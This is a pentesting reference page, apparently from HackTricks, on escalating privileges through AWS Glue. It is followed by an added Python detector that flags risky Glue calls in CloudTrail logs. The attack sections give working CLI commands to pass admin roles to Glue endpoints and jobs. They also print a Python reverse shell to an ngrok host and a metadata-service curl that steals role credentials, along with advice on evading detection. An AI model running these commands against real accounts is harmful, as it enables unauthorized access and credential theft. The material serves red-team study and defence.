AWS - Glue Privesc

Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!

Other ways to support HackTricks:

glue

iam:PassRole, glue:CreateDevEndpoint, (glue:GetDevEndpoint | glue:GetDevEndpoints)

Users with these permissions can create a new AWS Glue development endpoint and attach to it an existing service role that Glue is allowed to assume, with whatever permissions that role carries.

Once the endpoint is set up, the attacker can SSH into the endpoint instance and steal the IAM credentials of the assigned role:

# Create endpoint
aws glue create-dev-endpoint --endpoint-name <endpoint-name> \
--role-arn <arn-role> \
--public-key file:///ssh/key.pub

# Get the public address of the instance
## You could also use get-dev-endpoints
aws glue get-dev-endpoint --endpoint-name privesctest

# SSH with the glue user
ssh -i /tmp/private.key glue@ec2-54-72-118-58.eu-west-1.compute.amazonaws.com

To stay undetected, it is recommended to use the IAM credentials from inside the actual Glue virtual machine rather than exfiltrating them.

Potential Impact: Privesc to the specified glue service role.

glue:UpdateDevEndpoint, (glue:GetDevEndpoint | glue:GetDevEndpoints)

Users with this permission can change the SSH key of an existing Glue development endpoint, granting themselves SSH access to it. This lets the attacker execute commands with the privileges of the role attached to the endpoint:

# Change public key to connect
aws glue update-dev-endpoint --endpoint-name target_endpoint \
--public-key file:///ssh/key.pub

# Get the public address of the instance
## You could also use get-dev-endpoints
aws glue get-dev-endpoint --endpoint-name privesctest

# SSH with the glue user
ssh -i /tmp/private.key glue@ec2-54-72-118-58.eu-west-1.compute.amazonaws.com

Potential Impact: Privesc to the glue service role in use.

iam:PassRole, (glue:CreateJob | glue:UpdateJob), (glue:StartJobRun | glue:CreateTrigger)

Users with iam:PassRole together with glue:CreateJob or glue:UpdateJob, plus glue:StartJobRun or glue:CreateTrigger, can create or update an AWS Glue job, attach any Glue service role to it, and start the job run. Glue jobs run arbitrary Python code, which can be used to establish a reverse shell. That reverse shell can then be used to steal the IAM credentials of the role attached to the Glue job, leading to unauthorized access or actions within that role's permissions:

# Content of the python script saved in s3:
#import socket,subprocess,os
#s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
#s.connect(("2.tcp.ngrok.io",11216))
#os.dup2(s.fileno(),0)
#os.dup2(s.fileno(),1)
#os.dup2(s.fileno(),2)
#p=subprocess.call(["/bin/sh","-i"])
#To get the IAM Role creds run: curl http://169.254.169.254/latest/meta-data/iam/security-credentials/dummy


# A Glue role with admin access was created
aws glue create-job \
--name privesctest \
--role arn:aws:iam::93424712358:role/GlueAdmin \
--command '{"Name":"pythonshell", "PythonVersion": "3", "ScriptLocation":"s3://airflow2123/rev.py"}'

# You can directly start the job
aws glue start-job-run --job-name privesctest
# Or you can create a trigger to start it
aws glue create-trigger --name triggerprivesc --type SCHEDULED \
--actions '[{"JobName": "privesctest"}]' --start-on-creation \
--schedule "0/5 * * * * *"  #Every 5mins, feel free to change

Potential Impact: Privesc to the specified glue service role.

glue:UpdateJob

With only the update permission, an attacker can steal the IAM credentials of the role already attached to an existing job.

Potential Impact: Privesc to the attached glue service role.
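Every technique on this page (dev endpoint creation or key change, job creation or update, job run or trigger) leaves a CloudTrail record from glue.amazonaws.com, and the dangerous ones pass a role ARN. The following is an added detection example, not part of the original page: it scans CloudTrail-style records for those event names and rates a call high when the passed role is outside an allowlist. The sample records are constructed, and the requestParameters field names (roleArn for dev endpoints, role for jobs) are assumed to mirror the API parameter names.

```python
import json

# Glue API calls that, together with iam:PassRole, hand a principal the credentials of
# a Glue service role (dev endpoints via SSH, jobs via arbitrary Python).
WATCHED = {
    "CreateDevEndpoint": "dev endpoint created with a passed role",
    "UpdateDevEndpoint": "dev endpoint modified (e.g. SSH public key changed)",
    "CreateJob": "job created with a passed role",
    "UpdateJob": "existing job modified (script or role change)",
    "StartJobRun": "job run started",
    "CreateTrigger": "trigger created to run a job",
}

def role_from_event(event):
    # Assumed field names: roleArn for dev endpoints, role for jobs (mirroring the API).
    params = event.get("requestParameters") or {}
    return params.get("roleArn") or params.get("role")

def flag_glue_privesc(events, allowed_roles):
    """Return findings for Glue calls that can lead to role credential theft.
    A call passing a role outside allowed_roles is rated high, other watched calls medium."""
    findings = []
    for ev in events:
        name = ev.get("eventName")
        if ev.get("eventSource") != "glue.amazonaws.com" or name not in WATCHED:
            continue
        role = role_from_event(ev)
        severity = "high" if role and role not in allowed_roles else "medium"
        findings.append({"actor": (ev.get("userIdentity") or {}).get("arn"),
                         "action": name, "role": role,
                         "why": WATCHED[name], "severity": severity})
    return findings

# Constructed sample records (account id, names and ARNs are made up, not real data).
SAMPLE_EVENTS = [
    {"eventSource": "glue.amazonaws.com", "eventName": "CreateDevEndpoint",
     "userIdentity": {"arn": "arn:aws:iam::111111111111:user/dev"},
     "requestParameters": {"endpointName": "privesctest",
                           "roleArn": "arn:aws:iam::111111111111:role/GlueAdmin"}},
    {"eventSource": "glue.amazonaws.com", "eventName": "CreateJob",
     "userIdentity": {"arn": "arn:aws:iam::111111111111:user/dev"},
     "requestParameters": {"name": "privesctest",
                           "role": "arn:aws:iam::111111111111:role/GlueETL"}},
    {"eventSource": "s3.amazonaws.com", "eventName": "GetObject"},
]
ALLOWED = {"arn:aws:iam::111111111111:role/GlueETL"}

if __name__ == "__main__":
    print(json.dumps(flag_glue_privesc(SAMPLE_EVENTS, ALLOWED), indent=2))
```

Pair this with an iam:PassRole policy that limits which roles can be passed to Glue; the allowlist here should be the same set of role ARNs.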
